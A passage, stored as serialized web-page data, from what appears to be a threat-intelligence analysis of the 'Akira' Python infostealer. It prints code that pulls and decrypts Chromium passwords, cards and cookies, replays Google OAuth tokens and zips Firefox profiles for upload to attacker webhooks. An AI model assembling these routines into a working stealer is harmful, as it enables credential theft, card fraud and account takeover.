Browser",[1258,10207,10208],{},"Opera & Opera GX",[1258,10210,10211],{},"Chromium",[1258,10213,10214],{},"Comodo Dragon",[1258,10216,10217],{},"Epic Privacy Browser",[1258,10219,10220],{},"Iridium Browser",[1258,10222,10223],{},"UR Browser",[1258,10225,10226],{},"Vivaldi Browser",[1258,10228,10229],{},"Yandex Browser",[1258,10231,10232],{},"Slimjet, Amigo, Torch, Kometa, Orbitum, CentBrowser, 7Star, Sputnik, Uran",[1258,10234,10235,10238,10239,1289,10242,10253,10255,10256,10265,10267,10268,805,10271,10274],{},[251,10236,10237],{},"Firefox‑based"," (via ",[63,10240,10241],{},"GeckoDriver",[1255,10243,10244,10247,10250],{},[1258,10245,10246],{},"Mozilla Firefox",[1258,10248,10249],{},"Waterfox",[1258,10251,10252],{},"Pale Moon",[531,10254],{},"Akira dynamically locates user profiles using environment variables and well-known directory structures:",[56,10257,10259],{"className":8482,"code":10258,"language":8484,"meta":65,"style":65},"user_path = os.path.join(os.getenv(\"LOCALAPPDATA\"), \"Google\", \"Chrome\", \"User Data\")\n",[63,10260,10261],{"__ignoreMap":65},[102,10262,10263],{"class":104,"line":105},[102,10264,10258],{},[531,10266],{},"It recursively checks for available browser profiles (e.g. ",[63,10269,10270],{},"Default",[63,10272,10273],{},"Profile 1",", etc.) and targets SQLite databases within those paths.",[186,10276,10278],{"id":10277},"_741-data-types-extracted","7.4.1 Data Types Extracted",[12,10280,192],{},[417,10282,420,10283],{"style":8673},[438,10284,10285,420,10298,420,10311,420,10323,420,10335,420,10347,420,10358],{},[426,10286,424,10287,424,10291,424,10295,420],{},[430,10288,10290],{"style":10289},"text-align: left; width: 22%;","Data Type",[430,10292,10294],{"style":10293},"text-align: left; width: 28%;","Source File",[430,10296,10297],{"style":8841},"Notes",[426,10299,424,10300,424,10303,424,10308,420],{},[443,10301,10302],{},"Saved Passwords",[443,10304,10305,10307],{},[63,10306,4597],{}," (Chromium)",[443,10309,10310],{},"Decrypted via DPAPI or AES-GCM (post Chromium v80)",[426,10312,424,10313,424,10316,424,10320,420],{"style":8697},[443,10314,10315],{},"Cookies",[443,10317,10318],{},[63,10319,10315],{},[443,10321,10322],{},"Can include session tokens, especially for Google/Facebook accounts",[426,10324,424,10325,424,10328,424,10332,420],{},[443,10326,10327],{},"Autofill Data",[443,10329,10330],{},[63,10331,4601],{},[443,10333,10334],{},"Addresses, emails, phone numbers, etc.",[426,10336,424,10337,424,10340,424,10344,420],{"style":8697},[443,10338,10339],{},"Credit Cards",[443,10341,10342],{},[63,10343,4601],{},[443,10345,10346],{},"Encrypted; requires master key",[426,10348,424,10349,424,10352,424,10355,420],{},[443,10350,10351],{},"Session Tokens",[443,10353,10354],{},"In-memory & cookies",[443,10356,10357],{},"Includes Gmail, Google accounts, and Discord OAUTH replay",[426,10359,424,10360,424,10363,424,10371,420],{"style":8697},[443,10361,10362],{},"History & URLs",[443,10364,10365,805,10368],{},[63,10366,10367],{},"History",[63,10369,10370],{},"Visited Links",[443,10372,10373],{},"Were also exfiltrated to the attacker",[52,10375],{"className":10376},[4854,4855],[12,10378,10379,10382],{},[251,10380,10381],{},"3. Extraction Modules","\nWhen malware authors target browsers, their primary treasure troves are the various SQLite databases where Chrome, Firefox, and their kin store credentials, cookies, history, and autofill entries. astor.py stitches together lightweight Python and native APIs to methodically pluck every piece of data—and even replay live OAuth sessions—without leaving a trace. Below is an in-depth, module-by-module tour, verbatim from the code.",[186,10384,10386,10387,1289],{"id":10385},"_742-password-dumper-chromiumgetpasswords","7.4.2 Password Dumper (",[63,10388,10389],{},"Chromium.GetPasswords",[12,10391,192],{},[12,10393,10394],{},"This module systematically searches through all Chromium-based browser profiles to extract saved login credentials. By targeting the Login Data SQLite database, it retrieves usernames and encrypted passwords, then uses the platform’s encryption key (retrieved via DPAPI or AES-GCM) to decrypt them into cleartext. These credentials are highly valuable for post-compromise pivoting or account takeover.",[56,10396,10398],{"className":8482,"code":10397,"language":8484,"meta":65,"style":65},"for root, _, files in os.walk(self.BrowserPath):\n for file in files:\n if file.lower() == \"login data\":\n # Copy DB → open → extract rows\n results = cursor.execute(\n \"SELECT origin_url, username_value, password_value FROM logins\"\n ).fetchall()\n for url, user, pwd_blob in results:\n clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n passwords.append((url, user, clear_pwd))\n",[63,10399,10400,10405,10410,10415,10420,10425,10430,10435,10440,10445],{"__ignoreMap":65},[102,10401,10402],{"class":104,"line":105},[102,10403,10404],{},"for root, _, files in os.walk(self.BrowserPath):\n",[102,10406,10407],{"class":104,"line":111},[102,10408,10409],{}," for file in files:\n",[102,10411,10412],{"class":104,"line":329},[102,10413,10414],{}," if file.lower() == \"login data\":\n",[102,10416,10417],{"class":104,"line":346},[102,10418,10419],{}," # Copy DB → open → extract rows\n",[102,10421,10422],{"class":104,"line":650},[102,10423,10424],{}," results = cursor.execute(\n",[102,10426,10427],{"class":104,"line":656},[102,10428,10429],{}," \"SELECT origin_url, username_value, password_value FROM logins\"\n",[102,10431,10432],{"class":104,"line":662},[102,10433,10434],{}," ).fetchall()\n",[102,10436,10437],{"class":104,"line":668},[102,10438,10439],{}," for url, user, pwd_blob in results:\n",[102,10441,10442],{"class":104,"line":674},[102,10443,10444],{}," clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n",[102,10446,10447],{"class":104,"line":680},[102,10448,10449],{}," passwords.append((url, user, clear_pwd))\n",[1255,10451,10452,10465,10471,10479,10496],{},[1258,10453,10454,10457,10458,10460,10461,10464],{},[251,10455,10456],{},"Locates"," every ",[63,10459,4597],{}," SQLite database under the browser’s ",[63,10462,10463],{},"User Data"," folder.",[1258,10466,10467,10470],{},[251,10468,10469],{},"Copies"," to a temp file to avoid browser locks.",[1258,10472,10473,1062,10476,1014],{},[251,10474,10475],{},"SQL Query",[63,10477,10478],{},"SELECT origin_url, username_value, password_value FROM logins",[1258,10480,10481,10484,10485,10488,10489,1305,10492,10495],{},[251,10482,10483],{},"Decrypts"," each ",[63,10486,10487],{},"password_value"," blob via AES‑GCM (",[63,10490,10491],{},"v10",[63,10493,10494],{},"v11",") or Windows DPAPI fallback.",[1258,10497,10498,10501,10502,1014],{},[251,10499,10500],{},"Writes"," output to ",[63,10503,10504],{},"Passwords/\u003CBrowserName> Passwords.txt",[186,10506,10508,10509,1289],{"id":10507},"_743-credit-card-dumper-chromiumgetcreditcards","7.4.3 Credit Card Dumper (",[63,10510,10511],{},"Chromium.GetCreditCards",[12,10513,192],{},[12,10515,10516],{},"Here, the stealer accesses stored credit card data from each browser profile’s Web Data file. It focuses on extracting expiration details and encrypted credit card numbers, which are then decrypted with the same logic as passwords. Although CVV codes are typically not stored, the recovered information can still be misused for card-not-present fraud.",[56,10518,10520],{"className":8482,"code":10519,"language":8484,"meta":65,"style":65},"results = cursor.execute(\n \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n).fetchall()\nfor month, year, enc_cc in results:\n cc_number = self.Decrypt(enc_cc, encryptionKey)\n ccs.append((cc_number, month, year))\n",[63,10521,10522,10527,10532,10537,10542,10547],{"__ignoreMap":65},[102,10523,10524],{"class":104,"line":105},[102,10525,10526],{},"results = cursor.execute(\n",[102,10528,10529],{"class":104,"line":111},[102,10530,10531],{}," \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n",[102,10533,10534],{"class":104,"line":329},[102,10535,10536],{},").fetchall()\n",[102,10538,10539],{"class":104,"line":346},[102,10540,10541],{},"for month, year, enc_cc in results:\n",[102,10543,10544],{"class":104,"line":650},[102,10545,10546],{}," cc_number = self.Decrypt(enc_cc, encryptionKey)\n",[102,10548,10549],{"class":104,"line":656},[102,10550,10551],{}," ccs.append((cc_number, month, year))\n",[1255,10553,10554,10563,10570,10578],{},[1258,10555,10556,10559,10560,10562],{},[251,10557,10558],{},"Targets"," the ",[63,10561,4601],{}," SQLite stores under each profile.",[1258,10564,10565,1062,10567,1014],{},[251,10566,10475],{},[63,10568,10569],{},"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards",[1258,10571,10572,540,10574,10577],{},[251,10573,10483],{},[63,10575,10576],{},"card_number_encrypted"," exactly like the password blobs.",[1258,10579,10580,10583,10584,1014],{},[251,10581,10582],{},"Outputs"," to ",[63,10585,10586],{},"CreditCards/\u003CBrowserName> CreditCards.txt",[186,10588,10590,10591,1289],{"id":10589},"_744-cookie-dumper-chromiumgetcookies","7.4.4 Cookie Dumper (",[63,10592,10593],{},"Chromium.GetCookies",[12,10595,192],{},[12,10597,10598],{},"Cookies, especially session cookies, are prime targets for account hijacking without passwords. This module dumps all cookie files across profiles, decrypts them, and collects essential metadata like domain, name, and expiration. Combined with fingerprinting, these cookies can enable seamless replay attacks on authenticated services.",[56,10600,10602],{"className":8482,"code":10601,"language":8484,"meta":65,"style":65},"results = cursor.execute(\n \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n).fetchall()\nfor host, name, path, blob, expiry in results:\n cookie_val = self.Decrypt(blob, encryptionKey)\n cookies.append((host, name, path, cookie_val, expiry))\n",[63,10603,10604,10608,10613,10617,10622,10627],{"__ignoreMap":65},[102,10605,10606],{"class":104,"line":105},[102,10607,10526],{},[102,10609,10610],{"class":104,"line":111},[102,10611,10612],{}," \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n",[102,10614,10615],{"class":104,"line":329},[102,10616,10536],{},[102,10618,10619],{"class":104,"line":346},[102,10620,10621],{},"for host, name, path, blob, expiry in results:\n",[102,10623,10624],{"class":104,"line":650},[102,10625,10626],{}," cookie_val = self.Decrypt(blob, encryptionKey)\n",[102,10628,10629],{"class":104,"line":656},[102,10630,10631],{}," cookies.append((host, name, path, cookie_val, expiry))\n",[1255,10633,10634,10642,10650,10658],{},[1258,10635,10636,10457,10639,10641],{},[251,10637,10638],{},"Scans",[63,10640,10315],{}," SQLite database.",[1258,10643,10644,540,10647,1014],{},[251,10645,10646],{},"Selects",[63,10648,10649],{},"host_key, name, path, encrypted_value, expires_utc",[1258,10651,10652,10484,10654,10657],{},[251,10653,10483],{},[63,10655,10656],{},"encrypted_value"," blob to reveal the actual cookie string.",[1258,10659,10660,10663,10664,1014],{},[251,10661,10662],{},"Saves"," into ",[63,10665,10666],{},"Cookies/\u003CBrowserName> Cookies.txt",[186,10668,10670,10671,1289],{"id":10669},"_745-google-session-dumper-chromiumdump_google_sessions","7.4.5 Google Session Dumper (",[63,10672,10673],{},"Chromium.dump_google_sessions",[12,10675,192],{},[12,10677,10678],{},"One of the more advanced components, this routine decrypts stored OAuth tokens from the token_service table. By replaying them via Google’s multilogin endpoint, the malware can regenerate active session cookies—allowing attackers to hijack Google accounts without credentials. This illustrates how access tokens have become prime targets in modern stealers.",[56,10680,10682],{"className":8482,"code":10681,"language":8484,"meta":65,"style":65},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\nfor service, blob in cursor.fetchall():\n iv = blob[3:15]\n ciphertext = blob[15:-16]\n cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n token = cipher.decrypt(ciphertext).decode()\n # Replays via POST to OAuth endpoint\n response = requests.post(\n \"https://accounts.google.com/oauth/multilogin\",\n headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n data={\"source\": \"com.google.Drive\"}\n )\n save each account’s cookies to file\n",[63,10683,10684,10689,10694,10699,10704,10709,10714,10719,10724,10729,10734,10739,10743],{"__ignoreMap":65},[102,10685,10686],{"class":104,"line":105},[102,10687,10688],{},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\n",[102,10690,10691],{"class":104,"line":111},[102,10692,10693],{},"for service, blob in cursor.fetchall():\n",[102,10695,10696],{"class":104,"line":329},[102,10697,10698],{}," iv = blob[3:15]\n",[102,10700,10701],{"class":104,"line":346},[102,10702,10703],{}," ciphertext = blob[15:-16]\n",[102,10705,10706],{"class":104,"line":650},[102,10707,10708],{}," cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n",[102,10710,10711],{"class":104,"line":656},[102,10712,10713],{}," token = cipher.decrypt(ciphertext).decode()\n",[102,10715,10716],{"class":104,"line":662},[102,10717,10718],{}," # Replays via POST to OAuth endpoint\n",[102,10720,10721],{"class":104,"line":668},[102,10722,10723],{}," response = requests.post(\n",[102,10725,10726],{"class":104,"line":674},[102,10727,10728],{}," \"https://accounts.google.com/oauth/multilogin\",\n",[102,10730,10731],{"class":104,"line":680},[102,10732,10733],{}," headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n",[102,10735,10736],{"class":104,"line":9019},[102,10737,10738],{}," data={\"source\": \"com.google.Drive\"}\n",[102,10740,10741],{"class":104,"line":9025},[102,10742,9950],{},[102,10744,10745],{"class":104,"line":9031},[102,10746,10747],{}," save each account’s cookies to file\n",[1255,10749,10750,10766,10776,10786],{},[1258,10751,10752,540,10755,10758,10759,10762,10763,10765],{},[251,10753,10754],{},"Fetches",[63,10756,10757],{},"service"," and raw ",[63,10760,10761],{},"encrypted_token"," from ",[63,10764,4601],{}," clone.",[1258,10767,10768,10771,10772,10775],{},[251,10769,10770],{},"AES‑GCM decryption"," using the browser’s ",[63,10773,10774],{},"Local State"," key.",[1258,10777,10778,10781,10782,10785],{},[251,10779,10780],{},"Replays"," decrypted tokens in a POST to Google’s ",[63,10783,10784],{},"multilogin"," API to reconstruct valid OAuth cookies.",[1258,10787,10788,10790,10791,1014],{},[251,10789,10500],{}," per-account session files under ",[63,10792,10793],{},"Cookies/\u003Cdisplay_email> Google Session.txt",[186,10795,10797,10798,1289],{"id":10796},"_746-history-dumper-chromiumgethistory","7.4.6 History Dumper (",[63,10799,10800],{},"Chromium.GetHistory",[12,10802,192],{},[12,10804,10805],{},"This function extracts browsing history entries including URL, title, and visit frequency. Beyond privacy invasion, this data helps attackers understand victim behavior, identify high-value targets (e.g., banking portals), or tailor social engineering payloads.",[56,10807,10809],{"className":8482,"code":10808,"language":8484,"meta":65,"style":65},"results = cursor.execute(\n \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n).fetchall()\nhistory.sort(key=lambda x: x[3], reverse=True)\nreturn [(url, title, count) for url, title, count, _ in history]\n",[63,10810,10811,10815,10820,10824,10829],{"__ignoreMap":65},[102,10812,10813],{"class":104,"line":105},[102,10814,10526],{},[102,10816,10817],{"class":104,"line":111},[102,10818,10819],{}," \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n",[102,10821,10822],{"class":104,"line":329},[102,10823,10536],{},[102,10825,10826],{"class":104,"line":346},[102,10827,10828],{},"history.sort(key=lambda x: x[3], reverse=True)\n",[102,10830,10831],{"class":104,"line":650},[102,10832,10833],{},"return [(url, title, count) for url, title, count, _ in history]\n",[1255,10835,10836,10847,10857],{},[1258,10837,10838,540,10840,10843,10844,10846],{},[251,10839,10646],{},[63,10841,10842],{},"url, title, visit_count, last_visit_time"," from every ",[63,10845,10367],{}," DB.",[1258,10848,10849,10852,10853,10856],{},[251,10850,10851],{},"Sorts"," entries by ",[63,10854,10855],{},"last_visit_time"," descending.",[1258,10858,10859,540,10861,1014],{},[251,10860,10582],{},[63,10862,10863],{},"History/\u003CBrowserName> History.txt",[186,10865,10867,10868,1289],{"id":10866},"_747-autofill-dumper-chromiumgetautofills","7.4.7 Autofill Dumper (",[63,10869,10870],{},"Chromium.GetAutofills",[12,10872,192],{},[12,10874,10875],{},"Autofill entries—like addresses, names, emails, and sometimes payment-related data—are scraped from the browser’s Web Data storage. These values may not seem critical, but when aggregated, they offer a rich profile of the victim’s identity and behavior.",[56,10877,10879],{"className":8482,"code":10878,"language":8484,"meta":65,"style":65},"results = cursor.execute(\n \"SELECT name, value FROM autofill\"\n).fetchall()\nfor field, value in results:\n autofills.append((field.strip(), value.strip()))\n",[63,10880,10881,10885,10890,10894,10899],{"__ignoreMap":65},[102,10882,10883],{"class":104,"line":105},[102,10884,10526],{},[102,10886,10887],{"class":104,"line":111},[102,10888,10889],{}," \"SELECT name, value FROM autofill\"\n",[102,10891,10892],{"class":104,"line":329},[102,10893,10536],{},[102,10895,10896],{"class":104,"line":346},[102,10897,10898],{},"for field, value in results:\n",[102,10900,10901],{"class":104,"line":650},[102,10902,10903],{}," autofills.append((field.strip(), value.strip()))\n",[1255,10905,10906,10919],{},[1258,10907,10908,10910,10911,10914,10915,10918],{},[251,10909,10754],{}," form-fill entries: ",[63,10912,10913],{},"name, value"," from the ",[63,10916,10917],{},"web data"," file.",[1258,10920,10921,10923,10924,1014],{},[251,10922,10500],{}," out as ",[63,10925,10926],{},"Autofill/\u003CBrowserName> Autofill.txt",[186,10928,10930,10931,10933,10934,1289],{"id":10929},"_748-firefox-profile-grabber-geckodriver-grabfirefoxprofiles","7.4.8 Firefox Profile Grabber (",[63,10932,10241],{}," & ",[63,10935,10936],{},"grabFirefoxProfiles",[12,10938,192],{},[12,10940,10941],{},"Unlike the granular Chromium routines, this function opts for a broad approach: it compresses the entire Firefox profile directory—including saved logins, cookies, and bookmarks—and exfiltrates it wholesale. This ensures attackers can analyze or extract data offline, bypassing decryption hurdles with known NSS tooling.",[56,10943,10945],{"className":8482,"code":10944,"language":8484,"meta":65,"style":65},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n for root, dirs, files in os.walk(source_path):\n zipf.write(each file)\n# Upload via GoFile/File.io, then POST via attacker webhooks\n",[63,10946,10947,10952,10957,10962],{"__ignoreMap":65},[102,10948,10949],{"class":104,"line":105},[102,10950,10951],{},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n",[102,10953,10954],{"class":104,"line":111},[102,10955,10956],{}," for root, dirs, files in os.walk(source_path):\n",[102,10958,10959],{"class":104,"line":329},[102,10960,10961],{}," zipf.write(each file)\n",[102,10963,10964],{"class":104,"line":346},[102,10965,10966],{},"# Upload via GoFile/File.io, then POST via attacker webhooks\n",[1255,10968,10969,10979,10989],{},[1258,10970,10971,10974,10975,10978],{},[251,10972,10973],{},"Zips"," the entire ",[63,10976,10977],{},"%APPDATA%\\Mozilla\\Firefox\\Profiles"," directory.",[1258,10980,10981,10984,10985,10988],{},[251,10982,10983],{},"Names"," it ",[63,10986,10987],{},"%TEMP%\\\u003CComputerName>_Firefox_profiles.zip"," and sends the download link over the same webhook channels.",[1258,10990,10991,10994,10995,805,10998,805,11001,11004],{},[251,10992,10993],{},"Also"," invokes the same SQLite-based extraction functions (",[63,10996,10997],{},"logins.json",[63,10999,11000],{},"cookies.sqlite",[63,11002,11003],{},"places.sqlite",") against each Firefox profile using the NSS decryption routines already present.",[186,11006,11008],{"id":11007},"_749-extraction-summary","7.4.9 Extraction Summary",[12,11010,192],{},[12,11012,11013,11014,805,11016,805,11018,805,11020,6190,11022,11025,11026,11029,11030,11032,11033,805,11035,6190,11037,11039,11040,11043],{},"Astor.py orchestrates a comprehensive browser compromise by systematically harvesting every credential and session artifact across Chromium-based and Firefox clients. It locates and safely copies each SQLite store—",[63,11015,4597],{},[63,11017,4601],{},[63,11019,10315],{},[63,11021,10367],{},[63,11023,11024],{},"autofill","—then runs targeted SQL queries to extract URLs, usernames, passwords, credit-card details, cookies, browsing history, and form-fill entries. Passwords and payment data are decrypted via AES-GCM (or Windows DPAPI fallback), while cookies are similarly unwrapped to reveal their plaintext values. For Google accounts, encrypted OAuth tokens from ",[63,11027,11028],{},"token_service"," are decrypted and replayed against the ",[63,11031,10784],{}," API to regenerate live session cookies. Finally, Firefox profiles are archived wholesale (including ",[63,11034,10997],{},[63,11036,11000],{},[63,11038,11003],{},") and delivered as ZIPs, ensuring no artifact is left behind. This end-to-end pipeline runs silently under ",[63,11041,11042],{},"%TEMP%\\\u003CComputerName>",", producing neatly organized output files for every data category.",[41,11045,11047],{"id":11046},"_75-decryption-logic","7.5 Decryption Logic",[12,11049,47],{},[12,11051,11052],{},"Modern browsers like Chrome and Edge encrypt sensitive data—such as passwords, cookies, and credit card details—before storing them locally. Akira includes built-in decryption routines tailored to handle both legacy and current Chromium encryption methods. This ensures it can extract cleartext data regardless of the system's patch level or browser version.",[12,11054,11055],{},"At the core of this process is the extraction and decryption of the browser’s master encryption key, stored in a file called Local State. Depending on the browser version and Windows build, Akira dynamically selects the appropriate decryption method:",[12,11057,11058],{},"DPAPI (Data Protection API) is used on older systems, where Chrome stores secrets protected by the current user's Windows credentials.",[12,11060,11061],{},"AES-GCM is used on modern Chromium builds, where a randomly generated master key is itself encrypted with DPAPI, then used for in-app encryption of user data.",[12,11063,11064],{},"By first decrypting the Local State master key, Akira gains the ability to unlock all browser secrets—paving the way for extracting credentials, tokens, cookies, and more.",[12,11066,11067],{},[251,11068,11069],{},"Key extraction",[56,11071,11073],{"className":8482,"code":11072,"language":8484,"meta":65,"style":65},"local_state_path = os.path.join(user_path, \"Local State\")\nwith open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n local_state = json.load(f)\nmaster_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[63,11074,11075,11080,11085,11090],{"__ignoreMap":65},[102,11076,11077],{"class":104,"line":105},[102,11078,11079],{},"local_state_path = os.path.join(user_path, \"Local State\")\n",[102,11081,11082],{"class":104,"line":111},[102,11083,11084],{},"with open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n",[102,11086,11087],{"class":104,"line":329},[102,11088,11089],{}," local_state = json.load(f)\n",[102,11091,11092],{"class":104,"line":346},[102,11093,11094],{},"master_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[12,11096,11097],{},[251,11098,11099],{},"Decryption (AES-GCM):",[56,11101,11103],{"className":8482,"code":11102,"language":8484,"meta":65,"style":65},"nonce = value[3:15]\nciphertext = value[15:-16]\ntag = value[-16:]\ncipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\ndecrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[63,11104,11105,11110,11115,11120,11125],{"__ignoreMap":65},[102,11106,11107],{"class":104,"line":105},[102,11108,11109],{},"nonce = value[3:15]\n",[102,11111,11112],{"class":104,"line":111},[102,11113,11114],{},"ciphertext = value[15:-16]\n",[102,11116,11117],{"class":104,"line":329},[102,11118,11119],{},"tag = value[-16:]\n",[102,11121,11122],{"class":104,"line":346},[102,11123,11124],{},"cipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\n",[102,11126,11127],{"class":104,"line":650},[102,11128,11129],{},"decrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[12,11131,11132,11133,1014],{},"If fallback to DPAPI is needed (on older systems), it uses ",[63,11134,11135],{},"win32crypt.CryptUnprotectData()",[12,11137,11138,11144],{},[251,11139,11140,11141,1551],{},"Explanation of ",[63,11142,11143],{},"decrypt_password_blob","\nThis function demonstrates how Akira Stealer decrypts each saved password value from Chromium-based browsers. It handles two cases:",[6086,11146,11147,11157],{},[1258,11148,11149,11152,11153,11156],{},[251,11150,11151],{},"Windows DPAPI blobs"," (older or non-GCM encrypted data): Falls back to the system call ",[63,11154,11155],{},"CryptUnprotectData",", which uses the user’s Windows credentials to decrypt.",[1258,11158,11159,11162,11163,11166],{},[251,11160,11161],{},"AES-GCM encrypted blobs"," (Chrome v10/v11 format): Parses the version header, extracts the IV and authentication tag, and uses the ",[63,11164,11165],{},"cryptography"," library to decrypt the payload securely.",[56,11168,11170],{"className":8482,"code":11169,"language":8484,"meta":65,"style":65},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\n\n\ndef decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n \"\"\"\n Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n\n Parameters:\n - buffer: raw encrypted blob from the `password_value` field\n - key: the master AES key retrieved via DPAPI from Local State\n\n Returns:\n - Decrypted UTF-8 plaintext password\n \"\"\"\n # 1) DPAPI fallback for non-AES-GCM blobs\n if not buffer.startswith((b'v10', b'v11')):\n # Uses Windows CryptUnprotectData under the hood\n return CryptUnprotectData(buffer)\n\n # 2) AES-GCM decryption for Chrome v10/v11 format:\n # Bytes layout:\n # [0:3] = version header ('v10'/'v11')\n # [3:15] = initialization vector (IV)\n # [15:-16] = ciphertext payload\n # [-16:] = GCM authentication tag\n iv = buffer[3:15]\n ciphertext = buffer[15:-16]\n tag = buffer[-16:]\n\n # Initialize AES-GCM cipher with extracted IV and tag\n cipher = Cipher(\n algorithms.AES(key),\n modes.GCM(iv, tag),\n backend=default_backend()\n )\n decryptor = cipher.decryptor()\n\n # Perform decryption; raises if authentication fails\n plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n\n # Decode to UTF-8, ignoring any stray errors\n return plaintext.decode('utf-8', errors='ignore')\n",[63,11171,11172,11177,11182,11186,11190,11195,11199,11204,11208,11213,11218,11223,11227,11232,11237,11241,11246,11251,11256,11261,11265,11270,11275,11280,11285,11290,11295,11300,11305,11310,11314,11319,11324,11329,11334,11339,11343,11348,11352,11357,11362,11366,11371],{"__ignoreMap":65},[102,11173,11174],{"class":104,"line":105},[102,11175,11176],{},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n",[102,11178,11179],{"class":104,"line":111},[102,11180,11181],{},"from cryptography.hazmat.backends import default_backend\n",[102,11183,11184],{"class":104,"line":329},[102,11185,7846],{"emptyLinePlaceholder":2180},[102,11187,11188],{"class":104,"line":346},[102,11189,7846],{"emptyLinePlaceholder":2180},[102,11191,11192],{"class":104,"line":650},[102,11193,11194],{},"def decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n",[102,11196,11197],{"class":104,"line":656},[102,11198,9824],{},[102,11200,11201],{"class":104,"line":662},[102,11202,11203],{}," Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n",[102,11205,11206],{"class":104,"line":668},[102,11207,7846],{"emptyLinePlaceholder":2180},[102,11209,11210],{"class":104,"line":674},[102,11211,11212],{}," Parameters:\n",[102,11214,11215],{"class":104,"line":680},[102,11216,11217],{}," - buffer: raw encrypted blob from the `password_value` field\n",[102,11219,11220],{"class":104,"line":9019},[102,11221,11222],{}," - key: the master AES key retrieved via DPAPI from Local State\n",[102,11224,11225],{"class":104,"line":9025},[102,11226,7846],{"emptyLinePlaceholder":2180},[102,11228,11229],{"class":104,"line":9031},[102,11230,11231],{}," Returns:\n",[102,11233,11234],{"class":104,"line":9037},[102,11235,11236],{}," - Decrypted UTF-8 plaintext password\n",[102,11238,11239],{"class":104,"line":9043},[102,11240,9824],{},[102,11242,11243],{"class":104,"line":9049},[102,11244,11245],{}," # 1) DPAPI fallback for non-AES-GCM blobs\n",[102,11247,11248],{"class":104,"line":9055},[102,11249,11250],{}," if not buffer.startswith((b'v10', b'v11')):\n",[102,11252,11253],{"class":104,"line":9061},[102,11254,11255],{}," # Uses Windows CryptUnprotectData under the hood\n",[102,11257,11258],{"class":104,"line":9067},[102,11259,11260],{}," return CryptUnprotectData(buffer)\n",[102,11262,11263],{"class":104,"line":9073},[102,11264,7846],{"emptyLinePlaceholder":2180},[102,11266,11267],{"class":104,"line":9079},[102,11268,11269],{}," # 2) AES-GCM decryption for Chrome v10/v11 format:\n",[102,11271,11272],{"class":104,"line":9085},[102,11273,11274],{}," # Bytes layout:\n",[102,11276,11277],{"class":104,"line":9091},[102,11278,11279],{}," # [0:3] = version header ('v10'/'v11')\n",[102,11281,11282],{"class":104,"line":9097},[102,11283,11284],{}," # [3:15] = initialization vector (IV)\n",[102,11286,11287],{"class":104,"line":9103},[102,11288,11289],{}," # [15:-16] = ciphertext payload\n",[102,11291,11292],{"class":104,"line":9770},[102,11293,11294],{}," # [-16:] = GCM authentication tag\n",[102,11296,11297],{"class":104,"line":9775},[102,11298,11299],{}," iv = buffer[3:15]\n",[102,11301,11302],{"class":104,"line":9780},[102,11303,11304],{}," ciphertext = buffer[15:-16]\n",[102,11306,11307],{"class":104,"line":9785},[102,11308,11309],{}," tag = buffer[-16:]\n",[102,11311,11312],{"class":104,"line":9791},[102,11313,7846],{"emptyLinePlaceholder":2180},[102,11315,11316],{"class":104,"line":9796},[102,11317,11318],{}," # Initialize AES-GCM cipher with extracted IV and tag\n",[102,11320,11321],{"class":104,"line":9801},[102,11322,11323],{}," cipher = Cipher(\n",[102,11325,11326],{"class":104,"line":9806},[102,11327,11328],{}," algorithms.AES(key),\n",[102,11330,11331],{"class":104,"line":9811},[102,11332,11333],{}," modes.GCM(iv, tag),\n",[102,11335,11336],{"class":104,"line":9816},[102,11337,11338],{}," backend=default_backend()\n",[102,11340,11341],{"class":104,"line":9821},[102,11342,9950],{},[102,11344,11345],{"class":104,"line":9827},[102,11346,11347],{}," decryptor = cipher.decryptor()\n",[102,11349,11350],{"class":104,"line":9833},[102,11351,7846],{"emptyLinePlaceholder":2180},[102,11353,11354],{"class":104,"line":9839},[102,11355,11356],{}," # Perform decryption; raises if authentication fails\n",[102,11358,11359],{"class":104,"line":9844},[102,11360,11361],{}," plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n",[102,11363,11364],{"class":104,"line":9849},[102,11365,7846],{"emptyLinePlaceholder":2180},[102,11367,11368],{"class":104,"line":9854},[102,11369,11370],{}," # Decode to UTF-8, ignoring any stray errors\n",[102,11372,11373],{"class":104,"line":9859},[102,11374,11375],{}," return plaintext.decode('utf-8', errors='ignore')\n",[41,11377,11379],{"id":11378},"_76-session-token-hijacking","7.6 Session Token Hijacking",[12,11381,47],{},[12,11383,11384,11385,11388],{},"Akira doesn’t stop at passive data collection—it actively hijacks live session tokens to impersonate victims in real time. After extracting encrypted tokens from browser storage, it reconstructs the required authorization header and replays a ",[251,11386,11387],{},"MultiLogin"," request against Google’s OAuth endpoint. The code snippet below illustrates this process:",[56,11390,11392],{"className":8482,"code":11391,"language":8484,"meta":65,"style":65},"# Build SAPISIDHASH header for Google services\norigin = 